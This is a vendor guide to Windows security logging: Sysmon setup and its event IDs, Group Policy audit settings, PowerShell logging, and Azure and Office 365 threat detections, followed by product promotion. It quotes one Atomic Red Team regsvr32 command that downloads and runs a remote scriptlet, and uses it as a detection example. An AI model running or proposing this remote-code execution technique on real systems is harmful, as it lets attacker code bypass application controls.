Optimize Your Microsoft Environment For Better Security
To help organizations running Microsoft environments, our guide gives you practical, step-by-step Windows tips to significantly improve your visibility into malicious activity.
By configuring commonly-used tools and policy settings that are already available in your Windows environment, you can start logging indicators of a threat. You can use this information to create detections based on the log activity, or you can use a platform that has pre-built detections and playbooks on how to respond and remediate.
By streaming your Microsoft Azure and Office 365 logs to Blumira’s platform, you can also detect suspicious and threat-like behavior and alert your team in real-time for automated and faster containment.
Finally, we’ve made several open-source tools available on GitHub for Windows administrators and IT/security professionals to use in their own environment to save you time and resources required to configure settings properly for security logging and detection.
In this guide, you’ll learn:
- How to use built-in Windows tools like System Monitor for advanced visibility into Windows server logs
- How to configure Group Policy Objects (GPOs) to give you a deeper look into your Windows environment
- Free, pre-configured tools from Blumira you can use to easily automate Windows logging to enhance detection & response
- What indicators of security threats you should be able to detect for Microsoft Azure and Office 365
How to Enable Sysmon for Windows Logging and Security
In addition to the default built-in logging that Windows Server offers, there are also additional configuration options and software that can be added to increase the visibility of your environment. In addition to enabling Windows Advanced Auditing, System Monitor (Sysmon) is one of the most commonly used add-ons for Windows logging. With Sysmon, you can detect malicious activity by tracking code behavior and network traffic, as well as create detections based on the malicious activity
What is System Monitor (Sysmon)?
Sysmon is part of the Sysinternals software package, now owned by Microsoft and enriches the standard Windows logs by producing some higher level monitoring of events such as proces creations, network connections and changes to the file system. It is EXTREMELY easy to install and deploy. Following three steps will turn on an incredible amount of logging.
Installing Sysmon
- Download Sysmon (or entire Sysinternals suite)
- Download our recommended config file and save as config.xml in c:\windows
- Install by opening up a command prompt as administrator and typing
sysmon –accepteula –i c:\windows\config.xml
Detecting Common Threats With Sysmon Events
There are several extremely helpful Windows Event IDs that Sysmon generates to help detect common threats in many different enterprises. A few examples of the more useful generated events for security purposes are listed below. A full list of Event IDs that Sysmon can generate are located on their download page.
If you need to access the Sysmon events locally as opposed to viewing them in a SIEM, you will find them in the event viewer under Applications and Services Logs > Microsoft > Windows > Sysmon.
Event ID 1 - Process Creation
Sysmon will not only show what processes are being run, it will also show when they are ended, as well as a lot of information about the executable or binary itself. It also provides hashes for all of the binaries that are run on the system and lists if they are signed or not, making it easy to see if malicious code is attempting to mimic legitimate programs such as PowerShell or other built-in Microsoft tools.
Here you can see the Registry Editor program being run. In certain cases when you are unable to have a whitelist-only environment, you can use events such as these to alert when processes are running, if they are signed by the appropriate vendor, or spawning processes that they shouldn’t be (such as MS Word spawning PowerShell).
Event ID 3 - Network Connection Detected
In this example, we can see where the Setup.exe has been run, by whom, as well as that it is reaching out to download additional content from a cloud provider. These events can be useful in detecting command and control traffic (which may indicate that attackers are sending commands that steal data, spread malware, etc.), as well as giving visibility into what applications are accessing certain internet resources.
Event ID 4 - Sysmon Service State Changed
One potential action an attacker or malicious user could take is to disable the Sysmon service if they have the privileges to do so.
Event ID 13 - Registry Value Set Events
Alerts on additions and modifications of certain registry locations can be beneficial for detecting malicious persistence on an endpoint. Many times entries are added to “Run” and “Run Once” on Windows so malware can resume its activities after a host is rebooted.
Event ID 22 - DNS Logging
There are several benefits to logging DNS traffic, such as finding malicious remote access tools, security misconfigurations and command and control traffic.
Combining Events for Detection
Here we can see the popular Red Canary Atomic Red Team test for MITRE ATT&CK T1117 “Regsvr32” across several of the listed event IDs. Basically, regsvr32 can download and register DLLs (dynamiclink libraries) from URLs via the command line, something that is relatively easy to detect with Sysmon installed.
Event ID 1 shows:
- ParentImage - C:\Windows\System32\cmd.exe
- OriginalFileName - REGSVR32.EXE
- a. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including DLLs, on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries.
- CommandLine - regsvr32.exe /s /u /i:https://raw.githubusercontent.com/ redcanaryco/atomic-red-team/master/ atomics/T1117/RegSvr32.sct scrobj.dll
- a. Test attack from Atomic Red Team
Event ID 3 Shows:
- Image - - C:\Windows\System32\ regsvr32.exe
- a. Regsvr32 is the application creating the network connection
- Destination Port Name - https
- Destination IP - 151.101.0.133
Event ID 22 Shows:
- Query Name - raw. githubusercontent.com
- Destination Port Name - https
- Destination IP - 151.101.0.133
- a. Regsvr32 is the application requesting the DNS resolution of the location of the DLL on the internet
And when you tie them all together, you can create detections based on the malicious activity.
Learn more about how Blumira’s platform automatically detects and remediates security findings.
Advanced Windows Logging Settings
One of the most common configurations taken for granted is the built-in Microsoft Windows OS logging capabilities. Here’s a few modifications that can offer a deeper look into your Windows environment. While the Windows Event Viewer can be used to investigate single instances on an endpoint, the ability to correlate that data can be an advantage to any security team. The default logging enabled on a Microsoft AD Domain and all endpoints doesn’t include a fraction of the helpful data that can be obtained.
Group Policy Objects
Group Policy Objects (GPOs) are used to centrally manage hardware and software settings in a domain configuration. They are broken up into both local and domain policies and can be applied to specific accounts or containers in a certain order to see differing results. Controlling event logging settings from within GPOs allows different settings to be applied to different groups of assets such as domain controllers, servers and endpoints. *NOTE* All GPO changes should be thoroughly planned and tested in any environment.
Event Log Sizes
Default event log file sizes are traditionally too small and can cause log aggregation if a networking issue occurs.Taking into account the virtualization and hardware of today’s infrastructure, the sizes found below are recommended.
- Open Group Policy Management on a domain controller
- Either find the policy that will be edited or create a new policy
- Right-click on the GPO and select edit
- Configure event log sizes
- Computer Configuration > Policies > Windows Settings > Security Settings > Event Log
Advanced Audit Policy Configuration
Starting in Windows Server 2008 R2 and Windows 7, Advanced Audit Policy Configuration in Group Policy allowed the ability to configure much more granular audit settings.
-
Enable advanced auditing
- Navigate to: Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options
- i. Audit: Force audit policy subcategory settings - Enabled
-
Configure Advanced Audit Policies
- Computer Configuration > Policies > Windows Settings Security Settings > Advanced Audit Policy Configuration > Audit Policies
Account Logon |
|
Credential Validation |
Success and Failure |
Kerberos Authentication Service |
No Auditing |
Kerberos Service Ticket Operations |
No Auditing |
Other Account Logon Events |
Success and Failure |
Account Management |
|
Application Group Management |
Success and Failure |
Computer Account Management |
Success and Failure |
Distribution Group Management |
Success and Failure |
Other Account Management Events |
Success and Failure |
Security Group Management |
Success and Failure |
User Account Management |
Success and Failure |
Detailed Tracking |
|
DPAPI Activity |
No Auditing |
PNP (Plug and Play) |
Success |
Process Creation |
Success and Failure |
Process Termination |
No Auditing |
RPC Events |
Success and Failure |
Token Right Adjusted |
Success |
DS Access |
|
Detailed Directory Service Replication |
No Auditing |
Directory Service Access |
No Auditing |
Directory Service Changes |
Success and Failure |
Directory Service Replication |
No Auditing |
Logon/Logof |
|
Account Lockout |
Success |
Group Membership |
Success |
IPsec Extended Mode |
No Auditing |
IPsec Main Mode |
No Auditing |
IPsec Quick Mode |
No Auditing |
Logof |
Success |
Logon |
Success and Failure |
Network Policy Server |
Success and Failure |
Other Logon/Logoff Events |
Success and Failure |
Special Logon |
Success and Failure |
User / Device Claims |
No Auditing |
Object Access |
|
Application Generated |
Success and Failure |
Central Access Policy Staging |
No Auditing |
Certification Services |
Success and Failure |
Detailed File Share |
Success |
File Share |
Success and Failure |
File System |
Success |
Filtering Platform Connection |
Success |
Filtering Platform Packet Drop |
No Auditing |
Handle Manipulation |
No Auditing |
Kernel Object |
No Auditing |
Other Object Access Events |
No Auditing |
Registry |
Success |
Removable Storage |
Success and Failure |
SAM |
Success |
Policy Change |
|
Audit Policy Change |
Success and Failure |
Authentication Policy Change |
Success and Failure |
Authorization Policy Change |
Success and Failure |
Filtering Platform Policy Change |
Success |
MPSSVC Rule-Level Policy Change |
No Auditing |
Other Policy Change Events |
No Auditing |
Privilege Use |
|
Non Sensitive Privilege Use |
No Auditing |
Other Privilege Use Events |
No Auditing |
Sensitive Privilege Use |
Success and Failure |
System |
|
IPsec Driver |
Success |
Other System Events |
Failure |
Security State Change |
Success and Failure |
Security System Extension |
Success and Failure |
System Integrity |
Success and Failure |
Global Object |
|
File System |
No Auditing |
Registry |
No Auditing |
Advanced Microsoft Command Line Logging
For advanced Microsoft command line and powershell module logging, make the following changes to group policy:
- Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Configuration > Detailed Tracking > Audit Process Creation > Enable\
- Computer Configuration > Policies > Administrative Templates > System > Audit Process Creation > Include command line in process creation events > Enable
- User Configuration > Policies > Administrative Templates > Windows Components > Windows Powershell
- Turn on Module Logging
- Enable and set module names to *
- Turn on PowerShell Script Block Logging
- Enable and select Log script block invocation start / stop events
Summary
Windows offers an incredible amount of power with the settings that Group Policy can control, while these are just a portion of the logging GPO settings that can massively increase the visibility into an environment. Without a large portion of these settings, many different system attacks and malicious activities may end up being missed, such as brute-force authentication attempts, command and control traffic, and the addition of settings, software, or users to maintain a persistent connection on an endpoint
Combining advanced auditing with log collection, correlation, alerting and reports can give security teams deeper insights and the ability to react as needed to respond to or mitigate potential threats
Flowmira: NXLog Configurations for Windows Security
What is Flowmira?
Flowmira is a set of customized NXLog configurations that can be used to generate data from Windows endpoints, used for greater visibility into host actions. We recommend using NXLog for Windows log collection.
What is NXLog?
NXLog is a multi-platform log shipping tool that Blumira recommends using to help easily identify security risks, policy breaches or analyze operational problems in server logs, operation system logs and application logs. In concept, NXLog is similar to syslog-ng or Rsyslog, but it is not limited to UNIX and syslog only.
Where can I get NXLog?
You can download the community edition for free from NXLog. If you require WEF, you should obtain a license for the Commercial version of NXLog. If you’re a Blumira customer, you can utilize the Logstash Module to collect WEF logs instead of purchasing a NXLog Commercial license.
Why does an organization need this?
Windows logs are an invaluable source of security visibility. That said, time is a precious commodity. Spend that scarce resource somewhere other than designing a log forwarding configuration file with a proprietary syntax.
What does it do?
We couldn’t find this group of policy settings anywhere, so we created it ourselves by modifying a baseline model from Microsoft and a few other sources. Other vendors give you all of the settings and it takes about a half hour for administrators to set up.
Why did we create it?
Blumira is offering Flowmira to the public in order to help simplify Windows machine log collection for all organizations. These configurations can help you gain additional insight for better threat detection and response.
Detecting Security Threats: Azure & Office 365
To support today’s remote workforce and the digital transformation of modern organizations, Microsoft’s cloud services and applications provide productivity, collaboration and infrastructure benefits. Cloud services help scale resources and increase business efficiency, but they also come with security blindspots, as many organizations must maintain both hybrid on-premises and cloud environments.
Detect & Respond: Microsoft Azure
Microsoft Azure is a public cloud computing platform that can be used for different services like analytics, virtual computing, storage, networking and more. It provides solutions such as infrastructure as a service (IaaS), platform as a service (PaaS) and software as a service (SaaS)
Detecting security events in Azure is key to identifying early indicators of attacker reconnaissance (discovery), access attempts, lateral movement, malware or ransomware infection, data exfiltration and more.
What to Look For
These are a few examples of anomalous, suspicious and threat-like behavior and activity within Microsoft Azure that you should be able to quickly detect and alert on.
Microsoft Key Vault Tampering
Microsoft Azure Key Vault is a tool for securely storing and accessing secrets. A secret is anything that you want to tightly control access to, such as API keys, passwords, or certificates. Detecting any setting modifications or changes in one or more of your Azure Key Vaults can keep you informed of potentially malicious behavior. Blumira’s platform detects and provides playbooks to walk you through next steps and further investigation.
Single-Factor Powershell Authentication
Powershell is a very powerful tool that can cause serious harm to an environment if access falls into the hands of an attacker. Blumira can detect when a user account successfully authenticates without using multi-factor authentication (MFA), using Microsoft PowerShell command line to your Azure infrastructure. Blumira provides advice on next steps - in this case, disabling authentication for any account, especially those with administrative access. If determined to be a risk, Blumira recommends triggering incident response procedures and procedures for containment.
Attempted Azure Sign-In Using PowerShell
Password spraying, an attacker method of attempting a few authentications against many users or many authentications against one user, is a way to avoid brute-force or lockout detections. By detecting password spraying in use with an Azure Active Directory PowerShell session, you can identify when an attacker is attempting to access your environment. Blumira detects this and provides guidance on response - block the source IPs immediately and consider resetting passwords for targeted users.
Learn more about how easy it is to integrate Blumira with Microsoft Azure Event Hub, which streams Azure security events and logs to Blumira’s service for automated threat detection and response.
Detect & Respond: Microsoft Office 365
Office 365 (now named Microsoft 365) features a line of cloud-based, online versions of Microsoft Word PowerPoint, Excel and OneNote. It enables productivity and collaboration services, and is used widely by organizations and enterprises. As a result, it is also often targeted by attackers for access to company files and data.
What to Look For
These are just a few examples of anomalous, suspicious and threat-like behavior and activity within Microsoft Office 365 that you should be able to quickly detect and alert on.
Office 365 Anomalous Access Attempts
To protect against unauthorized access to your Office 365 server, you should be able to detect login attempts using password spraying. Password spraying, an attacker method of attempting a few authentications against many users or many authentications against one user, is a way to avoid bruteforce or lockout detections. Blumira detects this and provides guidance on response - block the source IPs immediately and consider resetting passwords for targeted users.
Office 365 Authentication Outside of U.S.
Another detection to protect against unauthorized access is based on geographical location. By detecting any user attempts to authenticate to your network outside of the U.S. (or any countries you don’t do business with or in), you can be alerted to a potential login risk. Blumira can detect and alert you to any anomalous logins from different countries, which can be remote users or a malicious attacker attempting to authenticate to the network with legitimate user credentials
Office 365 Email Forwarding Enabled
Another potential risk is if you detect a user enabling email forwarding for another user, targeting an organization. Unless it’s known and approved, Blumira recommends immediately stopping email forwarding, as it is often the first step in attacks against Office 365 environments. It’s worth considering disabling all email forwarding to reduce potential information leakage, and only allowing access when needed.
Learn more about how easy it is to integrate Blumira with Microsoft Office 365 to stream security events and logs to Blumira’s service for automated threat detection and response.
Blumira: Automated Threat Detection & Response
Easy deployment & use for organizations and IT teams of any size
Identify and respond to cybersecurity threats – all in one easy-to-use platform. Blumira’s cloud SIEM automates security operations for faster threat defense, even without a security team.
Security Operation Challenges
Limited Teams
Companies can’t afford SecOps & current teams may have limited security expertise.
Alert Fatigue
With over 10k alerts a day, how can analysts parse, analyze and investigate every alert?
Manual Process
- Fine-tuning SIEMs to get real security value out of them is slow & manual.
Streamline Your Security Operations With Blumira
Deploy in Hours
Failed SIEM deployments can drag on for months and years. Blumira’s cloud-delivered platform is designed for easy deployment in hours for small IT and security teams.
No More Alert Fatigue
Blumira’s automated threat detection and response platform comes with pre-built rules and tuning, sending only prioritized alerts to your team.
Security Expertise
Staffing your own team isn’t always an option. Blumira lets you run lean - while having access to our security team’s expertise when you really need it
Customers Blumira
Blumira provides expertise in understanding alerts. With a limited staff, it’s important that someone has my back – Blumira’s team has a real commitment to its customers.”
– Kevin Hayes,CISO, Merit Network
With Blumira, It’s Easy to:
Collect & Centralize Security Events
Easily integrate with applications and security tools across your environment, including cloud and on-prem. Blumira’s cloud-delivered service collects and parses security events, logs and alerts for visibility through a single pane of glass.
Respond Quickly With Guided Playbooks
Blumira’s guided and actionable remediation playbooks enable anyone in IT to easily respond to and stop cybersecurity threats – even without security expertise. Our security analysts give you step-by-step response workflows built into Blumira’s platform.
Rapidly Detect Cybersecurity Threats
By correlating log data with continuously updated threat intelligence feeds, Blumira’s platform detects known and suspected cybersecurity threats. It reduces the noise of false-positive alerts with automation and fine-tuning. With Blumira, you can deploy honeypots with the click of a button to detect lateral movement and unauthorized access across your environment.
Report on Security Findings & Activities
Quickly and easily gain access to the reports you need with Blumira’s intuitive reporting capabilities. Blumira guides you through the process to get access to the data and reporting that you need to help you investigate, report and meet compliance requirements such as PCI DSS, FFIEC, NIST 800- 53, HIPAA and other compliance frameworks.
Automate Remediation
When known cybersecurity threats are detected, Blumira’s automated remediation capabilities implement blocking rules to stop active cybersecurity threats without requiring manual intervention. This helps stop attackers early before they can access to critical systems.
Deploy in Hours, Not Months
It’s easy to integrate, centralize logs and realize security value in a matter of hours. Blumira takes care of log parsing to ease the burden on your team. We integrate with firewalls, endpoint protection, identity management providers, cloud infrastructure and applications, productivity applications and much more.
Want to Learn More?
See how easy it is to protect your organization from cybersecurity threats with Blumira’s automated threat detection & response solution.
Watch a Demo